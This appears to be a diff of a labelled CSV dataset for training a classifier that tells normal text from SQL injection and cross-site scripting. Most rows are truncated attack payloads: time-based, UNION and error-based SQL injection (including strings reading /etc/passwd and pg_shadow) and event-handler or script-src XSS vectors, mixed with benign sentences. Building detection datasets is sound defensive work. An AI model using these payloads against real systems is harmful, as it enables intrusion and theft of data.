rolls t",0,normal,26008 +"1' ) where 6772 = 6772 and row ( 6237,7469 ) > ( s",2,SQLi,14034 +"1%"" ) ) and 9198 = 9198--",2,SQLi,17231 +1 ) waitfor delay '0:0:5',2,SQLi,21588 +<svg><listing onload=alert(1)></listing>,1,XSS,7127 +"1%' ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ",2,SQLi,20522 +"<nobr onbeforepaste=""alert(1)"" contenteditable>tes",1,XSS,2442 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3105 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11091 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,7695 +"1' and elt ( 1210 = 1210,sleep ( 5 ) ) and 'pjrf' ",2,SQLi,21161 +<svg><datalist onload=alert(1)></datalist>,1,XSS,6097 +>-->*/</noscript></ti tle><script>alert()</script>,1,XSS,9489 +"1"" ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7655",2,SQLi,18540 +"1"" ) ) ) and char ( 120 ) ||char ( 106 ) ||char ( ",2,SQLi,21905 +Select a card.,0,normal,24796 +"1%' ) procedure analyse ( extractvalue ( 5840,conc",2,SQLi,13226 +-8515' or 1329 = 9536,2,SQLi,21454 +"1"" ) or 4915 = ( select count ( * ) from domain.do",2,SQLi,16916 "<a href=http://foo.bar/#x=`y></a><img alt=""`><img ",1,XSS,688 -<optgroup onpointerdown=alert(1)>XSS</optgroup>,1,XSS,5209 -"1' in boolean mode ) and extractvalue ( 7982,conca",2,SQLi,17161 -"<SCRIPT ""a='>'"" SRC=""httx://.rocks/.js""></SCRIPT>",1,XSS,8418 -"and (select substring(@@version,3,1))='c'",2,SQLi,10346 -<style>:target {color:red;}</style><blink id=x sty,1,XSS,4921 -Or when you see today a long economic expansion an,0,normal,25805 -"{""id"":null,""name"":""Turuiemon""}",0,normal,26928 -Find entries where required.,0,normal,23265 -waitfor delay '0:0:5' and 'gsvt' = 'gsvt,2,SQLi,19521 -1' ) ) as uizu where 1774 = 1774,2,SQLi,19601 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5463 -1' ) as rqfq where 7077 = 7077 or 2367 = ( select ,2,SQLi,13758 -Select water.,0,normal,24509 --5039 union all select 2114#,2,SQLi,19568 -"1 ) and elt ( 4249 = 4249,7259 )",2,SQLi,19584 -Select the perfect movie for movie night.,0,normal,24111 -</title><script>alert(/xss/)</script>,1,XSS,1290 -"1%"" and 2716 = ( select count ( * ) from sysusers ",2,SQLi,12774 -"Select "" Submit Payment Request "" to send the requ",0,normal,25686 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10693 -RLIKE (SELECT (CASE WHEN (4346=4346) THEN 0x61646d,2,SQLi,10336 -"{""id"":null,""name"":""principal possible""}",0,normal,26999 -Where can I select a fragrance for the party?,0,normal,23892 -Besides pamphlets on the Catholic and slavery ques,0,normal,26323 -or pg_sleep ( __TIME__ ) --,2,SQLi,11906 -"{""id"":null,""firstName"":""Sashi"",""lastName"":""Daran"",",0,normal,27067 -1 ) ) as uvep where 6016 = 6016 and 6969 = ( selec,2,SQLi,15831 -"-9313%"" ) or 5971 = 4572#",2,SQLi,15736 -"1%"" ) and 2006 = 2006",2,SQLi,12159 -1'|| ( select 'wvio' from dual where 8934 = 8934 a,2,SQLi,18264 -"1' ) or 6979 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,18815 -"1' in boolean mode ) union all select null,null,nu",2,SQLi,12454 -"<input onmouseover=""alert(1)"">test</input>",1,XSS,6080 -"<frameset onbeforepaste=""alert(1)"" contenteditable",1,XSS,5458 -Specify filters where necessary.,0,normal,23343 -;sleep(5)--,2,SQLi,11350 -select * from users where id = '1' or ( 1 ) = 1 un,2,SQLi,12058 -1'+ ( select 'diet' where 7004 = 7004 rlike sleep ,2,SQLi,18533 -"echo('IPT>alert("""")</SCRIPT>')",1,XSS,4132 --9615 ) as dntk where 4780 = 4780 union all select,2,SQLi,16352 -"1"" ) ) as aamh where 7432 = 7432 ( select ( case w",2,SQLi,17421 --6548 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,15409 -Sort the color swatches.,0,normal,22722 -<button onblur=alert(1) id=x></button><input autof,1,XSS,4135 -1%' ) ) or ( select 2* ( if ( ( select * from ( se,2,SQLi,17034 -"<script>$=1,alert($)</script>",1,XSS,9276 +"<samp draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,5211 +select ( case when ( 6166 = 3364 ) then 6166 else ,2,SQLi,17163 +"<video onkeydown=""alert(1)"" contenteditable>test</",1,XSS,8420 +"and (select substring(@@version,3,1))='X'",2,SQLi,10348 +<input4 onpointerleave=alert(1)>XSS</input4>,1,XSS,4923 +Other deals include $303 off select Playstation 4 ,0,normal,25802 +"{""id"":null,""firstName"":""Taylor"",""lastName"":""Tan Ji",0,normal,26925 +Sort results where specified.,0,normal,23262 +"-3116"" ) ) ) union all select 4600,4600,4600,4600-",2,SQLi,19523 +1%' ) and 6414 = ( select count ( * ) from rdb$fie,2,SQLi,19603 +<image2 onpointerover=alert(1)>XSS</image2>,1,XSS,5465 +"1' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x694",2,SQLi,13760 +Select tea.,0,normal,24506 +1'|| ( select 'jfxs' from dual where 5485 = 5485 a,2,SQLi,19570 +"-9098' union all select 3476,3476,3476,3476,3476,3",2,SQLi,19586 +"{""id"":null,""firstName"":""Han Jie"",""lastName"":""Kwong",0,normal,27453 +</textarea><script>alert(/xss/)</script>,1,XSS,1291 +"-4305 ) ) ) union all select 2401,2401--",2,SQLi,12776 +"Select ""Account Management"" and press X. On the ne",0,normal,25683 +"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10695 +IF(7423=7424) SELECT 7423 ELSE DROP FUNCTION xcjl-,2,SQLi,10338 +"{""id"":null,""firstName"":""Shane"",""lastName"":""Lee"",""a",0,normal,26996 +I'm thinking of where to volunteer my time.,0,normal,23889 +Bissell 86T3 Big Green Professional Carpet Cleaner,0,normal,26320 +"select * from users where id = 1 or 1#""1 union sel",2,SQLi,11908 +"{""id"":null,""firstName"":""Gnana"",""lastName"":""Kannan""",0,normal,27064 +"1', ( select ( case when ( 1609 = 1609 ) then wait",2,SQLi,15833 +1' waitfor delay '0:0:5' and 'jree' = 'jree,2,SQLi,15738 +1 or 4411 = ( select count ( * ) from sysusers as ,2,SQLi,12161 +1' ) where 7279 = 7279 and 8189 = ( select count (,2,SQLi,18266 +"1"" where 4688 = 4688 or 8466 = benchmark ( 5000000",2,SQLi,18817 +"-9286"" ) ) as mfxl where 9348 = 9348 union all sel",2,SQLi,12456 +"<object onclick=""alert(1)"">test</object>",1,XSS,6082 +"<cite draggable=""true"" ondragstart=""alert(1)"">test",1,XSS,5460 +Choose fields where necessary.,0,normal,23340 +;SELECT SLEEP(5); #,2,SQLi,11352 +select * from users where id = 1 +1 or 1 = 1 -- 1,2,SQLi,12060 +"1"" ) ) as zbfj where 2285 = 2285",2,SQLi,18535 +"<header draggable=""true"" ondrag=""alert(1)"">test</h",1,XSS,4134 +1' and 6969 = ( select 6969 from pg_sleep ( 5 ) ) ,2,SQLi,16354 +1' ) ) as vqrt where 5173 = 5173 and 3707 = ( sele,2,SQLi,17423 +1'|| ( select 'yaii' from dual where 7317 = 7317 u,2,SQLi,15411 +Create a stunning sculpture.,0,normal,22719 +"<figure onclick=""alert(1)"">test</figure>",1,XSS,4137 +select case when 9848 = 2618 then 1 else null end-,2,SQLi,17036 +"<script>Object.defineProperties(window, {Safe: {va",1,XSS,9278 <script ~~~>alert(0%0)</script ~~~>,1,XSS,862 -"1 and updatexml ( 3393,concat ( 0x2e,0x7171706a71,",2,SQLi,13405 -"1"" ) ) and row ( 6237,7469 ) > ( select count ( * ",2,SQLi,16576 -<style>:target {transform: rotate(180deg);}</style,1,XSS,1943 -ORDER BY 23#,2,SQLi,10296 -"<hgroup onpaste=""alert(1)"" contenteditable>test</h",1,XSS,4332 -"If you select pick-up, you'll head to the Walmart ",0,normal,26038 -"1"" ) ) as hdyn where 6027 = 6027 union all select ",2,SQLi,14120 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3971 -She carefully selected her words for the speech.,0,normal,23963 -Select help.,0,normal,24738 -1' ) ) ) or 2633 = dbms_pipe.receive_message ( chr,2,SQLi,12852 --8143 ) union all select 3014--,2,SQLi,13194 -"<noembed onbeforepaste=""alert(1)"" contenteditable>",1,XSS,2776 -"<strong onmouseover=""alert(1)"">test</strong>",1,XSS,4146 -Voters were invited to select their top 10 favorit,0,normal,25181 -1 ) ) as zykv where 2158 = 2158,2,SQLi,19002 -"<element onpaste=""alert(1)"" contenteditable>test</",1,XSS,2412 -1 ) as zhvx where 3171 = 3171 procedure analyse ( ,2,SQLi,17479 -select ( case when ( 2056 = 1917 ) then 2056 else ,2,SQLi,15458 -[\xC0][\xBC]script>document.vulnerable=true;[\xC0],1,XSS,1547 -"1"" ) and 8148 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,20974 -<marquee id=x tabindex=1 onfocus=alert(1)></marque,1,XSS,6954 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3136 -"1"" ) and 9198 = 9198--",2,SQLi,20241 -"-7683"" ) where 9664 = 9664 union all select 9664,9",2,SQLi,13233 --7548 or 2850 = 9666,2,SQLi,15628 -select,0,normal,26551 -"-4453' ) ) ) or 1570 = convert ( int, ( select cha",2,SQLi,14716 -"<summary onclick=""alert(1)"">test</summary>",1,XSS,3806 -"In ' FrontPage Editor ', select the tab at the bot",0,normal,26032 -copy myfile from '/etc/passwd';,2,SQLi,22516 -"-9659 ) ) ) union all select 8665,8665,8665,8665,8",2,SQLi,15161 -"<noembed onmouseleave=""alert(1)"">test</noembed>",1,XSS,6775 -"-6770' ) ) union all select 1845,1845,1845,1845,18",2,SQLi,19679 -"1%"" ) ) ) and 4386 = utl_inaddr.get_host_address (",2,SQLi,14063 -"1 ) ) and 3202 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,16849 -"1%"" ) ) ) procedure analyse ( extractvalue ( 5840,",2,SQLi,17642 -OR 'x'='x'#;,2,SQLi,10021 -1'+ ( select 'tzey' where 4491 = 4491 union all se,2,SQLi,18644 -"1' ) where 5799 = 5799 union all select null,null,",2,SQLi,22015 -"<font onkeydown=""alert(1)"" contenteditable>test</f",1,XSS,3328 -"<object onpaste=""alert(1)"" contenteditable>test</o",1,XSS,7383 -When you reach the checkout you'll be asked to sel,0,normal,25148 -><img src=x onerror=javascript:alert(`1`)>,1,XSS,1263 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,17360 -Where is your data?,0,normal,23435 --6778 ) as xutm where 6442 = 6442 union all select,2,SQLi,22251 -"-6292 ) union all select 7499,7499,7499,7499,7499,",2,SQLi,13118 -"1' ) where 1323 = 1323 or extractvalue ( 1297,conc",2,SQLi,13456 -"<div draggable=""true"" ondragend=""alert(1)"">test</d",1,XSS,6583 -"1, ( select ( case when ( 3902 = 3902 ) then ( sel",2,SQLi,18772 -1' ) ) ) and 6510 = ( select count ( * ) from sysu,2,SQLi,21120 -<td onpointerenter=alert(1)>XSS</td>,1,XSS,5022 -"-3853"" ) where 4626 = 4626 union all select 4626,4",2,SQLi,12584 -1' ) ) ) and sleep ( 5 ) and ( ( ( 'hwjy' = 'hwjy,2,SQLi,14996 -select * from users where id = 1 ||1 union select ,2,SQLi,11414 -"-3781%' ) union all select 7497,7497,7497,7497,749",2,SQLi,20267 -><script+src=http://search.twitter.com/trends.json,1,XSS,9803 -"1 ) ) union all select null,null,null,null,null,nu",2,SQLi,20260 -"1' where 2774 = 2774 union all select null,null,nu",2,SQLi,19174 -"1%' ) ) union all select null,null,null,null,null,",2,SQLi,18242 -"1%' ) or 8384 = like ( 'abcdefg',upper ( hex ( ran",2,SQLi,19405 -"<optgroup onmouseup=""alert(1)"">test</optgroup>",1,XSS,4109 -"<legend ondblclick=""alert(1)"">test</legend>",1,XSS,5214 -<head id=x tabindex=1 ondeactivate=alert(1)></head,1,XSS,3256 -<iframe onpointerover=alert(1)>XSS</iframe>,1,XSS,7324 -"<noscript oncopy=""alert(1)"" contenteditable>test</",1,XSS,2691 --1304' ) union all select 7639#,2,SQLi,14502 -<track id=x tabindex=1 onactivate=alert(1)></track,1,XSS,4628 -This means Prime customers in select neighborhoods,0,normal,25298 -</br style=a:expression(alert())>,1,XSS,1320 -Select a fragrance for your sanctuary.,0,normal,24076 -"1 and ( select 9067 from ( select count ( * ) ,con",2,SQLi,16591 -<colgroup onpointerdown=alert(1)>XSS</colgroup>,1,XSS,5163 -"<dfn onpaste=""alert(1)"" contenteditable>test</dfn>",1,XSS,7227 -Join discussion.,0,normal,23026 --9281 ) where 8363 = 8363 or make_set ( 8220 = 512,2,SQLi,12193 -1'|| ( select 'flbv' where 7451 = 7451 and 4595 = ,2,SQLi,17520 -"<div draggable=""true"" ondrag=""alert(1)"">test</div>",1,XSS,4530 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11668 -1%' ) ) ) and 8189 = ( select count ( * ) from sys,2,SQLi,19890 -1 ) ) as nwyh where 7100 = 7100,2,SQLi,21134 -"-9135"" ) ) or 6872 = 6872 and ( ( ""fllx"" = ""fllx",2,SQLi,12381 -"admin"") or ""1""=""1""/*",2,SQLi,9942 -Where's my missing sock?,0,normal,22556 -"1"" and 5556 = ( select count ( * ) from all_users ",2,SQLi,18063 -<param onpointerup=alert(1)>XSS</param>,1,XSS,6337 -"<bgsound draggable=""true"" ondragleave=""alert(1)"">t",1,XSS,6983 -pg_sleep(__TIME__)--,2,SQLi,10067 +-7103 ) ) or 4610 = 1871 and ( ( 1249 = 1249,2,SQLi,13407 +-6757' ) ) ) or 4524 = 3696,2,SQLi,16578 +"<details onkeydown=""alert(1)"" contenteditable>test",1,XSS,1944 +ORDER BY 25#,2,SQLi,10298 +"<tt onmouseenter=""alert(1)"">test</tt>",1,XSS,4334 +I'll select the beat that's inspiring to me.,0,normal,26035 +1' or 7552 = ( select count ( * ) from rdb$fields ,2,SQLi,14122 +"<marquee onmouseout=""alert(1)"">test</marquee>",1,XSS,3973 +Let's choose a recipe for Sunday brunch.,0,normal,23960 +Select support.,0,normal,24735 +1' ) as jdmh where 6175 = 6175 rlike sleep ( 5 ) #,2,SQLi,12854 +"-3370"" ) union all select 7845,7845,7845,7845,7845",2,SQLi,13196 +<tbody onblur=alert(1) tabindex=1 id=x></tbody><in,1,XSS,2777 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,4148 +Was there a period where we wanted to select dialo,0,normal,25178 +"-2948' ) ) or make_set ( 9354 = 9354,7185 ) and ( ",2,SQLi,19004 +"<iframe oncut=""alert(1)"" contenteditable>test</ifr",1,XSS,2413 +"1%"" ) ) union all select null,null,null,null#",2,SQLi,17481 +"end and ( ( ( ""revx"" = ""revx",2,SQLi,15460 +<style>@import'http://www.securitycompass.com/xss.,1,XSS,1548 +select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,20976 +"<select onpaste=""alert(1)"" contenteditable>test</s",1,XSS,6956 +"<dir onclick=""alert(1)"">test</dir>",1,XSS,3138 +1'+ ( select 'rqok' where 5074 = 5074 and 4386 = u,2,SQLi,20243 +"-4592"" ) ) or 4493 = utl_inaddr.get_host_address (",2,SQLi,13235 +1' ) ) and char ( 111 ) ||char ( 77 ) ||char ( 121,2,SQLi,15630 +select,0,normal,26548 +"-4233%"" ) or ( 8459 = 8459 ) *4906 and ( ""%"" = """,2,SQLi,14718 +"<style>@keyframes slidein {}</style><head style=""a",1,XSS,3808 +One remedy is to select who can and can't message ,0,normal,25824 +select * from pg_shadow;,2,SQLi,22513 +1' where 5060 = 5060,2,SQLi,15163 +<svg><cite onload=alert(1)></cite>,1,XSS,6777 +1' ) ) and 3754 = ( select upper ( xmltype ( chr (,2,SQLi,19681 +"waitfor delay '0:0:5' and ""%"" = """,2,SQLi,14065 +"1 ) where 3740 = 3740 union all select null,null,n",2,SQLi,16851 +-6984 order by 1#,2,SQLi,17644 +"UNION ALL SELECT 1, @@version;#",2,SQLi,10023 +1 order by 1#,2,SQLi,18646 +"1"" ) ) ) and 4386 = utl_inaddr.get_host_address ( ",2,SQLi,22017 +"<hr onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,3330 +<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7385 +"When you select it, it removes every apostrophe in",0,normal,25145 +><img src=x onerror=javascript:alert(('1'))>,1,XSS,1264 +1%' ) ) and 8189 = ( select count ( * ) from sysib,2,SQLi,17362 +Select your desire.,0,normal,24935 +"-9209%"" ) ) ) union all select 3736,3736,3736--",2,SQLi,22253 +"1 ) or extractvalue ( 1297,concat ( 0x5c,0x7171706",2,SQLi,13120 +1%' ) and 8189 = ( select count ( * ) from sysibm.,2,SQLi,13458 +<animatemotion onpointerout=alert(1)>XSS</animatem,1,XSS,6585 +"1"" ) ) ) and 8514 = ( select count ( * ) from doma",2,SQLi,18774 +-9758'+ ( select 'rlcy' where 3691 = 3691 union al,2,SQLi,21122 +<textarea id=x tabindex=1 ondeactivate=alert(1)></,1,XSS,5024 +"1' and elt ( 1210 = 1210,sleep ( 5 ) ) and 'ioar' ",2,SQLi,12586 +"make_set ( 2672 = 2672,5440 )",2,SQLi,14998 +"select * from users where id = 1 or ""]{"" or 1 = 1 ",2,SQLi,11416 +1' where 9544 = 9544,2,SQLi,20269 +><script+src=https://twitter.com/status/user_timel,1,XSS,9805 +-9975 where 9760 = 9760 order by 1--,2,SQLi,20262 +1 where 7038 = 7038,2,SQLi,19176 +1' ) ) as ewsw where 4667 = 4667 procedure analyse,2,SQLi,18244 +-4775' ) or 3038 = 3038,2,SQLi,19407 +<slot onfocusout=alert(1) tabindex=1 id=x></slot><,1,XSS,4111 +<style>@keyframes slidein {}</style><strike style=,1,XSS,5216 +"<nextid ondblclick=""alert(1)"">test</nextid>",1,XSS,3258 +<custom tags onpointerleave=alert(1)>XSS</custom t,1,XSS,7326 +"<progress draggable=""true"" ondragstart=""alert(1)"">",1,XSS,2692 +"-8612"" ) or 4043 = 3083 and ( ""pjzo"" like ""pjzo",2,SQLi,14504 +"<s onmouseleave=""alert(1)"">test</s>",1,XSS,4630 +I'm considering where to have a family outing.,0,normal,23909 +</script><script>alert(1)</script>,1,XSS,1321 +It's pretty easy to select one and tweak their app,0,normal,25938 +"-9583%"" ) ) union all select 9349,9349,9349,9349,9",2,SQLi,16593 +"<font onmouseover=""alert(1)"">test</font>",1,XSS,5165 +"<noembed draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,7229 +Update status.,0,normal,23023 +"end and ( ""vwbx"" = ""vwbx",2,SQLi,12195 +"-1678"" where 3706 = 3706 or 5023 = ctxsys.drithsx.",2,SQLi,17522 +"<style>@keyframes x{}</style><var style=""animation",1,XSS,4532 +"select * from users where id = 1 or "";,"" = 1 or 1 ",2,SQLi,11670 +"-6775"" union all select 7484,7484#",2,SQLi,19892 +1'+ ( select 'dhcv' where 9372 = 9372,2,SQLi,21136 +1%' or 7552 = ( select count ( * ) from rdb$fields,2,SQLi,12383 +and 1='1,2,SQLi,9944 +But a select group of living artists still remain ,0,normal,26314 +"1"" ) ) as ubrg where 7318 = 7318 and 7331 = 6529--",2,SQLi,18065 +"<strong oncut=""alert(1)"" contenteditable>test</str",1,XSS,6339 +<command onpointerup=alert(1)>XSS</command>,1,XSS,6985 +1) or sleep(__TIME__)#,2,SQLi,10069 "<div style=""position:absolute;top:0;left:0;width:1",1,XSS,918 -"-6155%' ) ) union all select 2421,2421,2421,2421,2",2,SQLi,18890 -1'+ ( select 'utlx' where 6256 = 6256 or extractva,2,SQLi,13289 --2372' or 1783 = 2656,2,SQLi,19289 +1' ) ) or sleep ( 5 ) and ( ( 'zxik' = 'zxik,2,SQLi,18892 +-4523 or 4747 = dbms_utility.sqlid_to_sqlhash ( ( ,2,SQLi,13291 +1' ) ) ) or 2367 = ( select count ( * ) from rdb$f,2,SQLi,19291 `'><script>\x2Bjavascript:alert(1)</script>,1,XSS,571 -"-5207 ) where 6987 = 6987 or 1570 = convert ( int,",2,SQLi,17833 -"<cite onmouseenter=""alert(1)"">test</cite>",1,XSS,3415 -Select your department.,0,normal,24863 -"1' ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,14807 -<option id=x tabindex=1 onactivate=alert(1)></opti,1,XSS,7032 -"<code onmouseleave=""alert(1)"">test</code>",1,XSS,6838 -1 ) and 3580 = ( select count ( * ) from domain.do,2,SQLi,13879 --9005 union all select 4410#,2,SQLi,19611 -select ( case when ( 6969 = 5797 ) then 6969 else ,2,SQLi,19346 -"1', ( select ( case when ( 5586 = 6403 ) then 1 el",2,SQLi,20768 -"1"" ) where 2680 = 2680 or elt ( 5873 = 5873,sleep ",2,SQLi,14027 -"1' where 4149 = 4149 and 3202 = like ( 'abcdefg',u",2,SQLi,14233 -"-1634%' union all select 5937,5937,5937,5937--",2,SQLi,19924 -"<a oncopy=""alert(1)"" contenteditable>test</a>",1,XSS,2218 -"First up, is the ban on immigration from select co",0,normal,26192 -Merge sources.,0,normal,23058 -<svg><nav onload=alert(1)></nav>,1,XSS,2828 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,22165 -These will act in a similar way to departmental se,0,normal,25320 -"<hgroup onmouseleave=""alert(1)"">test</hgroup>",1,XSS,4997 -"-5317' ) ) union all select 7673,7673,7673,7673,76",2,SQLi,17723 -"<nav onmousedown=""alert(1)"">test</nav>",1,XSS,3263 -"{""id"":null,""name"":""sat older paint frog""}",0,normal,27497 -"<command draggable=""true"" ondragstart=""alert(1)"">t",1,XSS,6839 -Scroll down to see select slides from GoodQues' pi,0,normal,25698 -<q onpointerdown=alert(1)>XSS</q>,1,XSS,5742 +"select like ( 'abcdefg',upper ( hex ( randomblob (",2,SQLi,17835 +"<xmp onkeyup=""alert(1)"" contenteditable>test</xmp>",1,XSS,3417 +Select your business.,0,normal,24860 +"1"" ) and 9254 = ( select count ( * ) from rdb$fiel",2,SQLi,14809 +<svg><animatetransform onend=alert(1) attributeNam,1,XSS,7034 +"<wbr onpaste=""alert(1)"" contenteditable>test</wbr>",1,XSS,6840 +"1"" and 8189 = ( select count ( * ) from sysibm.sys",2,SQLi,13881 +1' or sleep ( 5 ) and 'udqz' = 'udqz,2,SQLi,19613 +1 ) where 1333 = 1333 order by 1--,2,SQLi,19348 +"1"" ) as yzny where 4869 = 4869 rlike ( select * fr",2,SQLi,20770 +select ( case when ( 5198 = 2518 ) then 5198 else ,2,SQLi,14029 +1 where 2382 = 2382,2,SQLi,14235 +"1%"" union all select null,null,null#",2,SQLi,19926 +<svg><li onload=alert(1)></li>,1,XSS,2219 +"First, the largest size that I could select was si",0,normal,26189 +"{""id"":null,""name"":""GroudonPrimal Groudon""}",0,normal,27432 +"<basefont onpaste=""alert(1)"" contenteditable>test<",1,XSS,2829 +"1%' procedure analyse ( extractvalue ( 5840,concat",2,SQLi,22167 +"{""id"":null,""name"":""heat""}",0,normal,27001 +<fieldset onpointerenter=alert(1)>XSS</fieldset>,1,XSS,4999 +1 ) where 9010 = 9010 and 8514 = ( select count ( ,2,SQLi,17725 +"<font oncopy=""alert(1)"" contenteditable>test</font",1,XSS,3265 +Where's the cave?,0,normal,23523 +"<meter onpaste=""alert(1)"" contenteditable>test</me",1,XSS,6841 +Search for a specific name or select one from the ,0,normal,25695 +"<td onmousedown=""alert(1)"">test</td>",1,XSS,5744 "<div id=d><x xmlns=""><iframe onload=javascript:ale",1,XSS,651 --7710' where 5658 = 5658 or 3440 = cast ( ( chr ( ,2,SQLi,22424 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11095 -select ( case when ( 4006 = 1276 ) then 1 else 400,2,SQLi,18643 -select ( case when ( 2676 = 4191 ) then 2676 else ,2,SQLi,15408 -"<center onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,5396 -"<image onkeyup=""alert(1)"" contenteditable>test</im",1,XSS,7083 -They select top candidates.,0,normal,24435 -"<header oncopy=""alert(1)"" contenteditable>test</he",1,XSS,3522 -""" waitfor delay '0:0:20' /*",2,SQLi,10923 -Select the optimal settings for the camera.,0,normal,24020 -"<bdi onkeypress=""alert(1)"" contenteditable>test</b",1,XSS,4479 -<rtc onpointerenter=alert(1)>XSS</rtc>,1,XSS,5661 -><script+src=https://bebezoo.1688.com/fragment/ind,1,XSS,9789 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11097 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,18645 +"select * from generate_series ( 9863,9863,case whe",2,SQLi,15410 +"<slot draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,5398 +<bdo id=x tabindex=1 onbeforeactivate=alert(1)></b,1,XSS,7085 +Select options wisely.,0,normal,24432 +"<style>@keyframes slidein {}</style><nav style=""an",1,XSS,3524 +) waitfor delay '0:0:20' /*,2,SQLi,10925 +Select a fitness class to get active.,0,normal,24017 +"<dfn oncut=""alert(1)"" contenteditable>test</dfn>",1,XSS,4481 +"<style>@keyframes x{}</style><blockquote style=""an",1,XSS,5663 +><script+src=http://a.sm.cn/api/getgamehotboarddat,1,XSS,9791 <xss onfocusout=alert(1) autofocus tabindex=1 styl,1,XSS,68 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4--",2,SQLi,10777 -1'+ ( select 'ixza' where 4374 = 4374 union all se,2,SQLi,21189 -"-5672%"" or 3825 = 9675--",2,SQLi,13520 -Update the weather forecast.,0,normal,22584 -"-8144' ) where 1691 = 1691 or elt ( 7246 = 7816,78",2,SQLi,17643 -"<section onmousedown=""alert(1)"">test</section>",1,XSS,3840 -So don't let others rip you off with hidden charge,0,normal,25540 -1 ) as dlkh where 6179 = 6179 and 9198 = 9198--,2,SQLi,15716 -1' in boolean mode ) or exp ( ~ ( select * from ( ,2,SQLi,17376 -"1%"" ) union all select null,null,null--",2,SQLi,19889 -"<textarea onmouseenter=""alert(1)"">test</textarea>",1,XSS,8306 -"<math><a xlink:href=//jsfiddle.net/t846h/"">click",1,XSS,920 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(88)+CHA",2,SQLi,10702 -"<svg><animate xlink:href=""#x"" attributeName=""href""",1,XSS,166 -Select bike.,0,normal,24645 -1%' ) and 8734 = 5844,2,SQLi,22465 -"<address onbeforepaste=""alert(1)"" contenteditable>",1,XSS,6645 -"1%' or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,14335 -"-5150 ) ) ) union all select 5660,5660,5660#",2,SQLi,16286 -1%' ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ),2,SQLi,14283 -"<style>@keyframes x{}</style><label style=""animati",1,XSS,4595 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,19349 -"AND 5650=CONVERT(INT,(UNION ALL SELECTCHAR(73)+CHA",2,SQLi,10699 -1' ) and 6510 = ( select count ( * ) from sysusers,2,SQLi,13300 -"<map onkeyup=""alert(1)"" contenteditable>test</map>",1,XSS,2851 -1 where 7522 = 7522 and ( select 2* ( if ( ( selec,2,SQLi,19213 -"1' ) ) ) or updatexml ( 1808,concat ( 0x2e,0x71717",2,SQLi,12639 -"{""id"":null,""name"":""instance""}",0,normal,27491 -<style>:target {color:red;}</style><noembed id=x s,1,XSS,4461 -Let's discuss where to go for the weekend trip.,0,normal,23925 -"-7746' ) union all select 1998,1998,1998,1998,1998",2,SQLi,14909 -<select id=x tabindex=1 onactivate=alert(1)></sele,1,XSS,6624 -"<set attributeName=""xlink:href"" begin=""accessKey(d",1,XSS,9307 -"{""id"":null,""firstName"":""Jayden"",""lastName"":""Goh"",""",0,normal,27459 -"<figure onmousedown=""alert(1)"">test</figure>",1,XSS,8491 -"?skinName=asfunction:getURL,javascript:alert(1)//""",1,XSS,9868 -<blockquote onpointerover=alert(1)>XSS</blockquote,1,XSS,2736 -"<bgsound onbeforecut=""alert(1)"" contenteditable>te",1,XSS,5670 -select * from users where id = '1' or \<$ union se,2,SQLi,12032 -"1"" ) ) as swwb where 4244 = 4244",2,SQLi,21373 -Diane Black is a member of the Planned Parenthood ,0,normal,26240 -"<main onkeypress=""alert(1)"" contenteditable>test</",1,XSS,2379 -1' ) ) as dqby where 9256 = 9256,2,SQLi,15624 -1' ) ) ) and 3715 in ( ( char ( 113 ) +char ( 113 ,2,SQLi,22418 -"<select draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,4173 -"-2323"" ) as zgsn where 9274 = 9274 or 3440 = cast ",2,SQLi,12392 -"1"" ) where 1673 = 1673 or 7427 = dbms_pipe.receive",2,SQLi,12743 -1' ) rlike sleep ( 5 ),2,SQLi,16104 -Filter the Instagram feed.,0,normal,22596 -"1"" ) as klur where 7046 = 7046 and 3202 = like ( '",2,SQLi,14011 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6--",2,SQLi,10779 +"1 ) union all select null,null,null,null,null,null",2,SQLi,21191 +select sleep ( 5 ) and ( ( '%' = ',2,SQLi,13522 +Merge the colorful threads.,0,normal,22581 +"1"" where 2403 = 2403 or 4915 = ( select count ( * ",2,SQLi,17645 +"<dd onkeydown=""alert(1)"" contenteditable>test</dd>",1,XSS,3842 +"So, again, this might be for a select few of you.",0,normal,25537 +1%' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ,2,SQLi,15718 +1'+ ( select lang where 4191 = 4191 union all sele,2,SQLi,17378 +"-2803"" ) union all select 5337,5337,5337,5337,5337",2,SQLi,19891 +<textarea onbeforecut=alert(1) autofocus>XSS</text,1,XSS,8308 +"<math><a 